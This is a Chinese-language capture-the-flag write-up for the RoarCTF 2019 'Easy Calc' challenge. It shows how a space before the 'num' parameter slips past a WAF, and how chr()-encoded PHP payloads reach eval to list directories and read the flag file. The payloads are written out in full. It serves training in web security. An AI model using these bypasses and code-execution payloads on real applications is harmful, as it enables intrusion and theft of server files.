[RoarCTF 2019]Easy Calc

打开靶场：


查看源代码，发现有一个calc.php文件，并且提示设置了waf
先尝试访问calc.php

得到源码，使用get方式传参赋值给num，并且使用正则表达式进行了过滤，只要能绕过过滤，就可以通过eval进行任意php语句
首先尝试直接?num=phpinfo()

禁止访问，应该是waf起了作用，根据大佬们的wp知道可以通过在num前加一个空格进行绕过
原理：php解析规则：当php进行解析时，如果变量名前面有空格，php会自动去掉前面的空格再进行解析，假如waf不允许num变量接收字母，那么使用 num就可以，而php解析时就会自动把空格去掉

尝试? num=phpinfo()

成功绕过，先使用scandir查看目录中的内容，找到存有flag的文件

? num=scandir("/")

忘了/被过滤了，尝试绕过。使用chr对/的ascii码进行转换绕过，只有这个才不需要引号

? num=var_dump(scandir(chr(47)))

得到f1agg文件
尝试对该文件进行读取

? num=file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))

得到flag

还有一种解题方法，http走私，参考大佬的博客
[RoarCTF 2019]Easy Calc(http走私 && 利用PHP的字符串解析特性Bypass)